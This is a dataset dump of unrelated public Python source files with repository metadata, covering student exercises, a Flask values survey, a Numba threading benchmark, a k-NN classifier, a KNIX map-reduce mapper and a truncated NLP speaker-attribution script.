aa40b0cbb6794b86f4f6b97b7a6089daf2122cb8 | 455a09dc62682d91e0974305a985d80df773d850 | /ToetsJoost/opgave_1.py | dca1f34a33d34d95fda8f1541f5764dcb845b446 | [] | no_license | joerihofman/pythonjoostjoeri | 8e4890fecb1c09411b8875aecd6a9ec691ee9b7d | e45edeb0711d26f7df406a22376479e4e9e98661 | refs/heads/master | 2021-06-07T13:03:24.857534 | 2016-10-24T10:14:03 | 2016-10-24T10:14:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | # convert an integer to a hex digit (a character)
hexnumber = []
def hex_char(value):
if value <= 9 and value >= 0:
return chr(value + ord('0'))
else:
return chr(value - 10 + ord('A'))
# convert a decimal to a hex as a string
def to_hex(decimal):
global hexnumber
while decimal > 0:
if decimal > 15:
hexnumber.append('F')
decimal -= 15
else:
hexnumber.append(hex_char(decimal))
decimal -=decimal
return hexnumber
def main():
global hexnumber
var = int(input('Voer een integer waarde in'))
to_hex(var)
print(str(hexnumber).strip('[]'))
#assert to_hex(12345) == '3039', 'functie werkt'
#assert to_hex(0) == '0', 'niet ok'
main()
| [
"[email protected]"
] | |
2a5e8b7585bb274e5bd7965beb80b6d35c08b1cd | dcc9d1dbee5b3dc37f8c8a97ba3045a5a6227bf0 | /Print Binary Tree By Columns.py | 72b7e9ddf502d3eda35b20a3708397526cafac90 | [] | no_license | alex-bo/leetcode | 1786d450e50efb52fcb3748efa89ae1d5feb7d4f | c3cc49250a564801b82bac89115de94c75569dce | refs/heads/master | 2022-11-12T00:15:41.860752 | 2022-11-05T21:07:12 | 2022-11-05T21:07:12 | 184,185,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | from pprint import pprint
from typing import List
from binarytree import tree, Node
"""
Example:
tree:
_____2___
/ \
8 _11
/ \ / \
6 4 10 0
\
12
result:
[
[6],
[8],
[2, 4, 10],
[11, 12],
[0]
]
"""
def print_tree(tr: Node) -> List[List[int]]:
q = []
dct = {}
q.append((tr, 0))
while q:
node, i = q.pop(0)
if i not in dct:
dct[i] = []
dct[i].append(node.value)
if node.left:
q.append((node.left, i - 1))
if node.right:
q.append((node.right, i + 1))
res = []
for i in range(min(dct.keys()), max(dct.keys()) + 1):
res.append(dct[i])
return res
def main():
tr = tree()
print('-----------------------------------------------------')
print('tr {}:'.format(len(tr)))
print(tr)
res = print_tree(tr)
# print('{} {}'.format(sum(len(i) for i in res), res))
pprint(res)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
74ef94d80fccd28b35db0c7bd4e4ec800bcbf09e | af68bae787843595fc912b6358f31239c4081b37 | /MyFunc40.py | 21fa8c984a7274cd19e10a6d4593b0e89f55839d | [] | no_license | RaznoeVikaI/ExcelTempNew | 40ec74f493eb1cb19489eef7da3fa7345d1e27e2 | a9335a374f04bfea119e7ae2e770387a96518976 | refs/heads/master | 2020-07-27T15:55:00.985542 | 2019-09-17T20:15:48 | 2019-09-17T20:15:48 | 209,148,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,063 | py | import openpyxl
def readWriteCellFilials():
wb = openpyxl.load_workbook('задача для кандидата.xlsx')
# получаем имя активного листа
active_sheet_name = wb.active
# print(active_sheet_name)
# получаем другой лист
sheet_otchet = wb['отчет']
print(sheet_otchet)
# ----------111------------
# итоговая процентная маржа по всем статьям
SummaryMargin = 0
# заглушка
i =1
print("ПЫТАЕМСЯ ПИСАТЬ")
indexRowOtchet = 0
for cell in sheet_otchet['A']:
indexRowOtchet += 1
if (indexRowOtchet >= 7):
cellToInt = int(cell.value)
# int
# print(type(cellToInt))
if (cellToInt == 111):
if (indexRowOtchet == 7):
# for i in keysList:
# print("Ключи с расчитаныыми объемами")
# print(i)
# в зависимости от выбора "номер филиала" расчитывается ячейка "процентные доходы-расходы"
# может быть тоже не нужно, т.к. мы ведь берем ячейки уже посчитанные и делаем с ними
# вычисления дальше
if (i == 1):
print("Значения ячейки А i == 1")
cellA_Address = "A" + str(indexRowOtchet)
print(sheet_otchet[cellA_Address].value)
# Первый операнд для вычисления процентной маржи
cellE_Address = "E" + str(indexRowOtchet)
# 3746
print(sheet_otchet[cellE_Address].value)
cellG_Address = "G" + str(indexRowOtchet)
# 764.184
print(sheet_otchet[cellG_Address].value)
# Результат вычисления маржи пишем в строку следующую за последней со статьями
print(sheet_otchet.max_row)
lastArticlesRows = sheet_otchet.max_row
cellG_Margin_Address = "G" + str(lastArticlesRows+1)
ResultMargin = ((sheet_otchet[cellE_Address].value - sheet_otchet[cellG_Address].value)/\
sheet_otchet[cellE_Address].value)*100
SummaryMargin +=ResultMargin
sheet_otchet[cellG_Margin_Address].value = SummaryMargin
indexRowOtchet += 1
# Попробуем сохранить файл
wb.save('задача для кандидата.xlsx')
# ----------111------------ | [
"[email protected]"
] | |
688e659ae62848353d0129b34549c61df7294ab7 | cbd0af5a528e610e43dbfbff99db6eacc3a1fd78 | /src/phiAws/init/init_file.py | d330a8e476b012d790f0e769d8260ac9b7ed688e | [] | no_license | mnevadom/elasticS | ca65612a1905187f32449a048a7fc4a0dcc117b8 | 4b30feb0271518fc34be71646c7a535763c2fb8c | refs/heads/master | 2021-01-10T06:05:32.556550 | 2016-02-12T12:20:22 | 2016-02-12T12:20:22 | 48,800,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | import boto3
import pprint
| [
"[email protected]"
] | |
d334cd91cd590089c1527676b0f2089cd1eb7aee | 51ade080eddc891ae6eb1b41814f083ea1f7436a | /이정민/0817/5073.py | 7d9b967fd03c0f81753a130bd12869c4fc777628 | [] | no_license | hjyoon/yunhoyunho | f2cd33aa86f8713afdd784093e14295e76e6e21b | 6d661cdce8ee894d4d390fc508a66d3fed51a900 | refs/heads/main | 2023-08-26T03:46:40.529904 | 2021-11-11T12:44:37 | 2021-11-11T12:44:37 | 402,943,106 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,038 | py |
#리스트 만들어서 max값 따로빼서 나머지랑 비교
while True:
try:
triangle = [list(map(int, input().split()))]
for i in range(len(triangle)):
tri = []
for j in range(3):
tri.append(triangle[i][j])
if triangle[i][0] == 0 and triangle[i][1] == 0 and triangle[i][2] == 0:
break
if max(tri) < (sum(tri) - max(tri)):
if triangle[i][0] == triangle[i][1] and triangle[i][1] == triangle[i][2] and triangle[i][2] == \
triangle[i][0]:
print('Equilateral')
continue
if triangle[i][0] != triangle[i][1] and triangle[i][1] != triangle[i][2] and triangle[i][2] != \
triangle[i][0]:
print('Scalene')
continue
else:
print('Isosceles')
continue
else:
print('Invalid')
except:
break | [
"[email protected]"
] | |
d6fb6be797243b47f6e91b67e3f43f734e4ef948 | d83cdad8cebe755ff614cad5019a03a639184bea | /tests/dynamic_parallel_execution_groups/python/mapper.py | 180cfec7d7c5864a9a28fa0332b00b72d8606cb8 | [
"Apache-2.0"
] | permissive | iakkus/knix | 99e59be415aa2b453cd3dfccde81aa4dc610f33f | 263ad31181c4189b93159df9c9f2e363f4fc377d | refs/heads/master | 2022-11-04T21:12:41.639421 | 2020-07-22T07:24:52 | 2020-07-22T07:24:52 | 262,139,828 | 0 | 0 | Apache-2.0 | 2020-07-22T07:35:07 | 2020-05-07T19:25:05 | JavaScript | UTF-8 | Python | false | false | 7,719 | py | # Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import random
import time
MAX_RETRY = 1000
SLEEP_TIME = 1.0
def create_reducer_message(peg_id, job, num_mappers, final_next=None, mapper_id=None, next_reducer_id=None):
# this is where the reducer is going to write its 'session function id'
# i.e., running function id
reducer_id_key = peg_id + "_reducer"
message = {}
message["peg_id"] = peg_id
message["reducer_id_key"] = reducer_id_key
message["num_mappers"] = num_mappers
message["job"] = job
if mapper_id is not None:
message["mapper_id"] = mapper_id
if next_reducer_id is not None:
message["next_reducer_id"] = next_reducer_id
if final_next is not None:
message["final_next"] = final_next
return message
def create_mapper_message_list(peg_id, job, data, num_mappers, reducer_id, mapper_conditions=None):
# this assumes that num_mappers has been properly set before, so that
# each mapper should get at least one item
data_size = len(data)
mapper_event_list = []
data_size_per_mapper = int(math.ceil(data_size / num_mappers))
for i in range(num_mappers):
start = i * data_size_per_mapper
end = (i+1) * data_size_per_mapper
event = {}
event["peg_id"] = peg_id
event["mapper_id"] = i
event["num_mappers"] = num_mappers
event["reducer_id"] = reducer_id
event["job"] = job
event["data"] = data[start:end]
if mapper_conditions is not None:
event["mapper_conditions"] = mapper_conditions
mapper_event_list.append(event)
return mapper_event_list
def get_num_mappers_for_new_peg(data, num_mappers):
data_size = len(data)
# each mapper should get at least one item
if data_size < num_mappers:
num_mappers = data_size
return num_mappers
def should_create_peg(data, mapper_conditions):
# the criteria
if mapper_conditions is not None:
for cond in mapper_conditions:
if cond == "max_len":
if len(data) > mapper_conditions[cond]:
return True
return False
def wordcount(data):
words = []
for line in data:
words += line.split(" ")
result = {}
for word in words:
if word == "":
continue
if word not in result:
result[word] = 0
result[word] += 1
return result
def mergesort(data):
# also cover longer inputs
ret = None
size = len(data)
if size == 1:
ret = data
elif size == 2:
ret = []
if data[0] > data[1]:
ret.append(data[1])
ret.append(data[0])
else:
ret = data
else:
middle = int(size / 2)
leftdata = data[:middle]
rightdata = data[middle:]
leftsorted = mergesort(leftdata)
rightsorted = mergesort(rightdata)
ret = []
i = 0
j = 0
size1 = len(leftsorted)
size2 = len(rightsorted)
while i < size1 and j < size2:
if leftsorted[i] < rightsorted[j]:
ret.append(leftsorted[i])
i += 1
else:
ret.append(rightsorted[j])
j += 1
while i < size1:
ret.append(leftsorted[i])
i += 1
while j < size2:
ret.append(rightsorted[j])
j += 1
return ret
def handle(event, context):
# 1. check if we should create more dynamic PEGs
# 2. if not:
# 2.1 get reducer's info (i.e., storage key of where to find the running function id)
# 2.2. process the data
# 2.3. obtain the running function id of the reducer (i.e., look up the key from the data layer)
# 2.4. use reducer's running function id to send it a message with the result
# 3. if we should nest:
# 3.1. create mappers and reducers
# 3.2. pass the current reducer info to the newly generated reducer (so that it can also forward its result later)
# 1. check whether we should create a nested dynamic PEG
# if we generate another dynamic PEG, then we need to pass our
# reducer id key to the just generated PEG's reducer
my_data = event["data"]
# 2.1. get reducer's info and obtain its corresponding key
my_reducer_id = event["reducer_id"]
my_id = event["mapper_id"]
my_job = event["job"]
my_num_mappers = event["num_mappers"]
my_mapper_conditions = None
if "mapper_conditions" in event:
my_mapper_conditions = event["mapper_conditions"]
should_nest = should_create_peg(my_data, my_mapper_conditions)
if not should_nest:
# 2.2. process the data
if my_job["type"] == "wordcount":
result = wordcount(my_data)
elif my_job["type"] == "mergesort":
result = mergesort(my_data)
message = {}
message["mapper_id"] = my_id
message["mapper_result"] = result
context.send_to_running_function_in_session(my_reducer_id, message, send_now=False)
else:
# 3.1. create additional mappers and reducer
# pass the new reducer to the mappers
# 3.2 pass the current reducer info to the reducer
print("Going to create another PEG...")
my_num_mappers = get_num_mappers_for_new_peg(my_data, my_num_mappers)
random.seed()
session_id = context.get_session_id()
peg_id = session_id + "_" + str(time.time() * 1000.0) + "_" + str(random.uniform(0, 100000))
# pass the current mapper_id, so that the original reducer will know we're done
# also with our newly generated PEG
# pass also the current reducer_id_key,
# so that the newly generated reducer knows where to send the result (i.e., the original reducer of this mapper)
reducer_message = create_reducer_message(peg_id, my_job, my_num_mappers, mapper_id=my_id, next_reducer_id=my_reducer_id)
context.send_to_function_now("reducer", reducer_message)
# 2.3. get the reducer's 'running function id' using the key
retry = 0
new_reducer_id = None
new_reducer_key = reducer_message["reducer_id_key"]
while retry < MAX_RETRY:
new_reducer_id = context.get(new_reducer_key, is_private=True)
if new_reducer_id is None or new_reducer_id == "":
retry += 1
#print("Could not find a proper running function id yet; retrying..." + str(retry) + " " + peg_id)
time.sleep(SLEEP_TIME)
else:
break
# 2.4. send result to the reducer via its running function id
if new_reducer_id is None or new_reducer_id == "":
print("ERROR: Could not create a new PEG. no proper running function id: " + new_reducer_key)
raise "Could not create a new PEG: " + new_reducer_key
mapper_message_list = create_mapper_message_list(peg_id, my_job, my_data, my_num_mappers, new_reducer_id, mapper_conditions=my_mapper_conditions)
for msg in mapper_message_list:
context.add_workflow_next("mapper", msg)
return
| [
"[email protected]"
] | |
218d992827a2a6e201f6828586965dda7f457f02 | 991a15260558f1d83a73fa73c6ac7d2d20e2eae8 | /Python/Reference/Numba/NumbaMultiThread.py | 258bd873122cbe1f383a96a65943450ceaa3c2ad | [] | no_license | mjbankston/UberProject | a04c367e97c6ea88177fc77183538c588a43b505 | 6437caa45fa06ea9c49d6cbff7a4a93f79a4484b | refs/heads/master | 2020-03-11T20:59:41.960212 | 2018-10-03T18:42:22 | 2018-10-03T18:42:22 | 130,252,393 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,433 | py | import math
import threading
from timeit import repeat
import numpy as np
from numba import jit
nthreads = 4
size = 10**6
def func_np(a, b):
"""
Control function using Numpy.
"""
return np.exp(2.1 * a + 3.2 * b)
@jit('void(double[:], double[:], double[:])', nopython=True, nogil=True)
def inner_func_nb(result, a, b):
"""
Function under test.
"""
for i in range(len(result)):
result[i] = math.exp(2.1 * a[i] + 3.2 * b[i])
def timefunc(correct, s, func, *args, **kwargs):
"""
Benchmark *func* and print out its runtime.
"""
print(s.ljust(20), end=" ")
# Make sure the function is compiled before we start the benchmark
res = func(*args, **kwargs)
if correct is not None:
assert np.allclose(res, correct), (res, correct)
# time it
print('{:>5.0f} ms'.format(min(repeat(lambda: func(*args, **kwargs),
number=5, repeat=2)) * 1000))
return res
def make_singlethread(inner_func):
"""
Run the given function inside a single thread.
"""
def func(*args):
length = len(args[0])
result = np.empty(length, dtype=np.float64)
inner_func(result, *args)
return result
return func
def make_multithread(inner_func, numthreads):
"""
Run the given function inside *numthreads* threads, splitting its
arguments into equal-sized chunks.
"""
def func_mt(*args):
length = len(args[0])
result = np.empty(length, dtype=np.float64)
args = (result,) + args
chunklen = (length + numthreads - 1) // numthreads
# Create argument tuples for each input chunk
chunks = [[arg[i * chunklen:(i + 1) * chunklen] for arg in args]
for i in range(numthreads)]
# Spawn one thread per chunk
threads = [threading.Thread(target=inner_func, args=chunk)
for chunk in chunks]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return result
return func_mt
func_nb = make_singlethread(inner_func_nb)
func_nb_mt = make_multithread(inner_func_nb, nthreads)
a = np.random.rand(size)
b = np.random.rand(size)
correct = timefunc(None, "numpy (1 thread)", func_np, a, b)
timefunc(correct, "numba (1 thread)", func_nb, a, b)
timefunc(correct, "numba (%d threads)" % nthreads, func_nb_mt, a, b)
| [
"[email protected]"
] | |
bf3be012e4b2178febe82596ab08eef6c6c12ae9 | 8fe8eb1d39edbd601d6da53cd94ab3634ca762ce | /k-Nearest-neighbor.py | cf26405ea6c00f1a84e1e22cacb55b47c58e45a0 | [] | no_license | adityabilawar/K-Nearest-Neighbors | 55f1b7b7cc6fa67b5fc0bf43bd0d0aef6b4e80c3 | db9b78200383855f0106b56df65e5c2eaebc5565 | refs/heads/main | 2023-05-05T16:06:07.419635 | 2021-05-01T20:31:16 | 2021-05-01T20:31:16 | 326,750,398 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,215 | py | import sklearn
from sklearn.utils import shuffle
from sklearn.neighbors import KNeighborsClassifier
import pandas as pd
import numpy as np
from sklearn import linear_model, preprocessing
data = pd.read_csv("car.data")
le = preprocessing.LabelEncoder()
buying = le.fit_transform(list(data["buying"]))
maint = le.fit_transform(list(data["maint"]))
door = le.fit_transform(list(data["door"]))
persons = le.fit_transform(list(data["persons"]))
lug_boot = le.fit_transform(list(data["lug_boot"]))
safety = le.fit_transform(list(data["safety"]))
cls = le.fit_transform(list(data["class"]))
predict = "class"
X = list(zip(buying, maint, door, persons, lug_boot, safety))
y = list(cls)
x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, test_size = 0.1)
model = KNeighborsClassifier(n_neighbors=9)
model.fit(x_train, y_train)
acc = model.score(x_test, y_test)
print(acc)
predicted = model.predict(x_test)
names = ["unacc", "acc", "good", "vgood"]
for x in range(len(predicted)):
print("Predicted: ", names[predicted[x]], "Data: ", x_test[x], "Actual: ", names[y_test[x]])
n = model.kneighbors([x_test[x]], 9, True)
print("N: ", n) | [
"[email protected]"
] | |
6fb5c8f15f61c1706e1de02182770878e90f51e2 | 80ed2a6a86ccd635d801d4fa26b0db8fbb85e7c9 | /LEC/blog/migrations/0003_auto_20201006_1144.py | 86268a8c322cc3c34e4fb1cf0ab9c19a66a99f40 | [] | no_license | setuphub/webLEC | 0ed8a431baca256da119bbafcc5b572b538429c2 | 9136357cdeef0aedc52d6d97df8466a4bfe80bd8 | refs/heads/main | 2023-01-04T04:11:52.119823 | 2020-11-02T20:31:05 | 2020-11-02T20:31:05 | 301,351,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | # Generated by Django 3.1.1 on 2020-10-06 11:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_auto_20201006_1144'),
]
operations = [
migrations.AlterModelTable(
name='post',
table=None,
),
]
| [
"[email protected]"
] | |
ca58f82f80a70195ada7ad9d9b57a9caa57b5d93 | 191a7f83d964f74a2b3c7faeb4fc47d9c63d521f | /.history/main_20210529110646.py | c11465bf5e912bd5343d8b638bc2f0d69d2c8b17 | [] | no_license | AndreLiu1225/Kinder-Values-Survey | 2a317feee8d5b17c27da2b2116742656e35d8ab9 | 090c27da0c822abb7dfc0ec6e13ae1b3dcb7bbf3 | refs/heads/master | 2023-05-03T00:26:00.481423 | 2021-06-04T03:24:19 | 2021-06-04T03:24:19 | 371,989,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,896 | py | from flask import Flask, render_template, redirect, url_for, flash, request
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import StringField, TextField, SubmitField, IntegerField, SelectField, RadioField
from wtforms.validators import DataRequired, Email, EqualTo, Length, ValidationError
import datetime
import plotly.graph_objs as go
app = Flask(__name__)
app.config['SECRET_KEY'] = "0c8973c8a5e001bb0c816a7b56c84f3a"
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///site.db"
db = SQLAlchemy(app)
class Survey(db.Model):
age = db.Column(db.Integer, nullable=False, primary_key=True)
email = db.Column(db.String(50), unique=True, nullable=False)
profession = db.Column(db.String(50), nullable=False)
power = db.Column(db.Integer, nullable=False)
tradition = db.Column(db.Integer, nullable=False)
achievement = db.Column(db.Integer, nullable=False)
stimulation = db.Column(db.Integer, nullable=False)
hedonism = db.Column(db.Integer, nullable=False)
conformity = db.Column(db.Integer, nullable=False)
self_direction = db.Column(db.Integer, nullable=False)
benevolence = db.Column(db.Integer, nullable=False)
universalism = db.Column(db.Integer, nullable=False)
date_posted = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __repr__(self):
return f"Survey('{self.age}', '{self.name}', '{self.date_posted}')"
# @staticmethod
# def is_email_in_database(email):
# return True if Survey.query.filter_by(email=email).first() else False
class MCQ(FlaskForm):
email = StringField("What is your email?", validators=[DataRequired(), Email(message=('Not a valid email address')), Length(max=50)])
age = IntegerField("Please enter your age", validators=[DataRequired()])
profession = StringField("What is your profession?", validators=[DataRequired(), Length(max=30)])
# Self-Enhancement
power = IntegerField("Do you desire a higher social status and dominance over others? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
hedonism = IntegerField("Is personal gratification the most important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
achievement = IntegerField("Is achievement according to social standards important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
# Conservation
tradition = IntegerField("Do you care about preserving traditions? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
conformity = IntegerField("Do you think restraint of actions against social norms is important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
security = IntegerField("")
# Openness to change
stimulation = IntegerField("Do you prefer novel and exciting challenges in life? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
self_direction = IntegerField("Do you think independent thought and action are important (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
# Self-transcendence
benevolence = IntegerField("Are preserving and enhancing the welfare of your friends and family the most important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
universalism = IntegerField("I find it important to understand, tolerate, appreciate and protect all ethnicities and people. (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
submit = SubmitField("Submit")
@app.route('/', methods=['POST','GET'])
def values_quiz():
form = MCQ()
if form.validate_on_submit():
post = Survey(age=form.age.data, email=form.email.data, profession=form.profession.data, power=form.power.data,
tradition=form.tradition.data, achievement=form.achievement.data, stimulation=form.stimulation.data,
hedonism=form.hedonism.data, conformity=form.conformity.data, self_direction=form.self_direction.data,
benevolence=form.benevolence.data, universalism=form.universalism.data)
# if Survey.is_email_in_database(form.email.data):
# flash(f"The user with {form.email.data} has already filled the survey", "danger")
db.session.add(post)
db.session.commit()
flash(f'Survey is completed by {form.email.data}', 'success')
return redirect(url_for('data_dashboard'))
else:
flash('Ensure all questions are answered correctly', 'warning')
return render_template('MCQ.html', form=form)
@app.route('/results', methods=['POST','GET'])
def data_dashboard():
# power = request.form.get('power')
# tradition = request.form.get('tradition')
# achievement = request.form.get('achievement')
# stimulation = request.form.get('stimulation')
# hedonism = request.form.get('hedonism')
# conformity = request.form.get('conformity')
# self_direction = request.form.get('self_direction')
# benevolence = request.form.get('benevolence')
# universalism = request.form.get('universalism')
result = request.form
user_values = []
for i in result.values():
user_values.append(float(i))
dyn_values = []
for i in range(0, len(user_values)):
pass
return render_template('data_dashboard.html')
if __name__ == "__main__":
app.run(debug=True)
| [
"[email protected]"
] | |
05b4ccafaf0be88412c70c54cc82d5afc05c923f | d94162ca1ecdfea5f2acb319dc4700cccb55f941 | /package_structure/models.py | 3bd17ad4ee588a78de39ad6f20e7aca025f78341 | [] | no_license | vaidehidangi23/flaskblog | 69f46e764e35e945ab998540acf8888b009a19bc | 745fefa9c624e75c8bf0eee466e7c45bbabfaa9d | refs/heads/master | 2022-11-12T23:51:05.810731 | 2020-07-10T18:53:04 | 2020-07-10T18:53:04 | 278,036,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | from datetime import datetime
from __main__ import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), unique=True, nullable=False)
email = db.Column(db.String(110), unique=True, nullable=False)
image_file = db.Column(db.String(20), nullable=False, default='default.jpg')
password = db.Column(db.String(50), nullable=False)
posts = db.relationship('Post', backref='author', lazy=True)
def __repr__(self):
return f"User('{self.username}', '{self.email}', '{self.image_file}')"
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), nullable=False)
date_posted = db.Column(db.DateTime, nullable=False,default=datetime.utcnow)
content = db.Column(db.Text, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.title}', '{self.date_posted}')"
| [
"[email protected]"
] | |
69037af8902c95555784d6965770b0383184ab27 | 6f62a21f269864ae75d5b0fe7a65835dfb77bb63 | /tetris/venv/Scripts/pip3-script.py | 3479da8fdd232abc2657e4899a701d897f4976e7 | [] | no_license | hursliza/tetris | 217d6ae17419505fad442d8c7280050075ebfc4d | d15dc71afb5e85b0cf6e0f003f3f159d8b5a264f | refs/heads/master | 2021-03-17T12:09:16.219270 | 2020-04-02T11:02:26 | 2020-04-02T11:02:26 | 246,988,911 | 0 | 0 | null | null | null | null | ISO-8859-7 | Python | false | false | 396 | py | #!D:\studia\οτόσ\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
| [
"[email protected]"
] | |
e22b899f1c8fd95943bdbe46fad4f1ebb9049d5f | cf4baa30dd94e8dbf7b6d097b02f7fc62c416222 | /Django/DjangoApp/apps/surveys_app/views.py | 0fa2255fd93c02154a9cdb7b1573dcb1c31a57d6 | [] | no_license | py1-10-2017/AshwinRaman-py1-10-2017 | fcd5421951ceb8838b72183fe8e74a690afd604a | 11e27487129fa5a0bd01075829b0dcd2ea422bf3 | refs/heads/master | 2021-08-19T07:26:06.909086 | 2017-11-25T04:36:44 | 2017-11-25T04:36:44 | 105,705,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | from __future__ import unicode_literals
from django.shortcuts import render, HttpResponse, redirect
def surveys(request):
return HttpResponse("Placeholder - display all the surveys created")
def new_survey(request):
return HttpResponse("Placeholder for users to add a new survey")
| [
"[email protected]"
] | |
28af7761180fd39b25687a64d46b71bd4852c87d | c848f65a72e6fd7df20d53283f568b862e758c24 | /basic/,threading5.py | c030d687c60065395be26fe95476aeac523048cc | [] | no_license | yk0817/python_study | 029cbe7a70778ca7d6b2c8d71b9a1ae2587ef39f | 4d5171b78f84539e538f719a593feaae10e5a093 | refs/heads/master | 2023-05-25T12:08:55.431705 | 2023-05-13T01:57:46 | 2023-05-13T01:57:46 | 84,618,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | import threading,time
class MyThread(threading.Thread):
def __init__(self,count):
threading.Thread.__init__(self)
self.count = count
self.return_value = None
def run(self):
sum_value = 0
for i in range(1,1 + self.count):
sum_value += i
time.sleep(0.1)
self.return_value = sum_value
def get_value(self):
return self.return_value
thread1 = MyThread(5)
thread1.start()
thread1.join()
print(thread1.return_value) # 15 →インスタンス変数として取得
print(thread1.get_value()) # 15 →メソッドで取得
| [
"[email protected]"
] | |
e13ef4e93311f1a5135c51513292e37c3a21d53b | 341ac5a0b7a2fe550a0580f29a81dbaaf26d24cd | /attribution.py | 6a4df77e34df9b0b6a574d03bb5994e3e1f31b7a | [] | no_license | jielu0728/RelationExtraction | 7f9405a5a88e9dd7c4a3274fd9cc6126cedebee6 | 2839e55cb640e66973841983f18c385b8df2edb2 | refs/heads/master | 2016-09-06T00:22:57.547084 | 2015-10-25T23:16:01 | 2015-10-25T23:16:01 | 37,312,902 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,892 | py |
# coding: utf-8
# In[1]:
import nltk
import string
import jsonrpclib
from simplejson import loads
import simplejson
from nltk.corpus import wordnet as wn
import re
from string import punctuation
server = jsonrpclib.Server("http://localhost:8080")
r = re.compile(r'[{}]'.format(punctuation))
# name appears in the paragraph before
#
#
# 2 alternant lines
#
# if the name appears in the previous or following utterance with a pattern such as ',name,'
#
# the object of the speech verb
#
# In[2]:
f = open('annotation_speaker')
res = open('./candidate.data','w')
n = 0
instance = []
temp = []
speaker = []
p = 0
keyposition = [] #the linenum of the paragraph to be treated
for line in f:
if n <= 30420:
if '###############' in line:
keyposition.append(p)
current = [temp.pop()]
previous = temp[:]
temp = []
continue
if 'speaker: ' in line:
speaker.append(line.split('speaker: ')[1].split('\r\n')[0])
instance.append([current,previous,temp])
temp = []
p = 0
continue
if line.replace(' ','') != '\r\n':
temp.append(line.replace('\r\n',''))
p = p+1
n = n+1
#print instance[-1]
#instance [0,1,2]:
#0 : current paragraph (including the object utterance)
#1 : 9 previous paragraphs
#2 : 5 following paragraphs
# In[3]:
result = loads(server.parse(instance[0][1][7]))
#print result['sentences'][0]['parsetree'].split('] [')
# In[4]:
def countwordperline(instance,num_instance):
numlist = []
for i in range(3):
for j in range(len(instance[num_instance][i])):
new_strs = r.sub(' ',instance[num_instance][i][j])
num = len(new_strs.split())
numlist.append(num)
numlist.insert(keyposition[num_instance]-1, numlist.pop(0))
return numlist
#countwordperline(instance,0)
# In[5]:
def convertoffset(numlist,linenum,offset,sentence):
temp = sentence[0:offset]
new_strs = r.sub(' ',temp)
num = len(new_strs.split())
pos = 0
for i in range(linenum-1):
try:
pos = pos + numlist[i]
except IndexError:
print numlist,linenum,offset,sentence
cccccccccccccccccccccc
return pos+num+1
#convertoffset(countwordperline(instance,0),keyposition[0],33,instance[0][0][0])
# In[6]:
# no use, we can get the index from the loop number
def convertposition(numlist,linenum,position):
temp = position
i = 0
while temp > 0:
temp = temp - numlist[i]
i = i+1
i = i-1
if i == linenum-1:
return 0,0
elif i>linenum-1:
return 2,i-linenum
else:
return 1,i
#convertposition(countwordperline(instance,0),keyposition[0],669)
# In[7]:
def ner(instance):
entities = []
n = 0
for obj in instance:
numlist = countwordperline(instance,n)
print 'progress : '+str(float(n)/float(len(instance))*100)+'%\n'
current = [[]]
temp = []
for z in range(len(loads(server.parse(obj[0][0]))['sentences'])):
temp = temp + loads(server.parse(obj[0][0]))['sentences'][z]['parsetree'].split('] [')
for frag in temp:
if 'PartOfSpeech=NNP' in frag:
text = frag.split('Text=')[1].split(' ')[0]
